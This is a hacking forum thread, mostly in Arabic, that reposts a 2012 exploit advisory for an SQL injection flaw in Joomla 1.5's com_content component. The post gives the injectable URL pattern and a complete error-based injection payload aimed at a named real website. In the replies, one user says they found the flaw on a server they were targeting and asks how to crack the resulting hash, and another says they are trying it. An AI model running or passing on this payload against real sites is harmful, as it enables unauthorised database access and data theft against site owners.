:: vBspiders Professional Network :: - Joomla Component (com

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- - Joomla Component (com_content) SQL Injection Vulnerability (http://www.vbspiders.com/vb/t62674.html)

Joomla Component (com_content) SQL Injection Vulnerability

الـسـلام عـلـيـكـم شـبـاب

ثـغـره في سكربت جوملا حبيت اطرحها للجميع http://www.sec-art.net/images/smilies/Sunglasses.png

كود:

 

################################################################

# Exploit Title: Joomla Component (com_content) SQL Injection Vulnerability

# Google Dork:Use yOur M!nd ^_^

# Date: 4/6/2012

# Home: http://www.sec-art.net

# Exploit Author: Cyb3r-R00T

# Version: Joomla! 1.5 - Open Source Content Management

# Tested on: Debian GNU/Linux,Windows 7 Ultimate

################################################################

[~]Exploit/p0c :

http://site.com/index.php?option=com_content&view=category&id=[SQL]

[~]Example :

http://www.greenmining.or.id/index.php?option=com_content&view=category&id=75 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--pt-newmont&Itemid=3

#E0F

#Greetz 2#~ Karar alShaMi; Faris; H311 C0D3; TiGER-M@TE; RiSKy and all Sec-Art.net Members

تـحـيـاتي

Security Art | Cyb3r-R00T

رد: Joomla Component (com_content) SQL Injection Vulnerability

شكرا لك ع الثغرة
بارك الله فيك

رد: Joomla Component (com_content) SQL Injection Vulnerability

ممكن شرح للثغرة بالعربى اخى

رد: Joomla Component (com_content) SQL Injection Vulnerability

اه، بعرفها وعني سيرفر كنت مستهدفوا، ولقيت فيه هاي التغره، بس المشكله بتكون ف الهاش !!! لو كان في طريقة لفكوا يا رب تطرحوها

رد: Joomla Component (com_content) SQL Injection Vulnerability

اقتباس:

المشاركة الأصلية كتبت بواسطة bleu moon (المشاركة 438170)

مشكـــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــور حبيبي جاري التجربة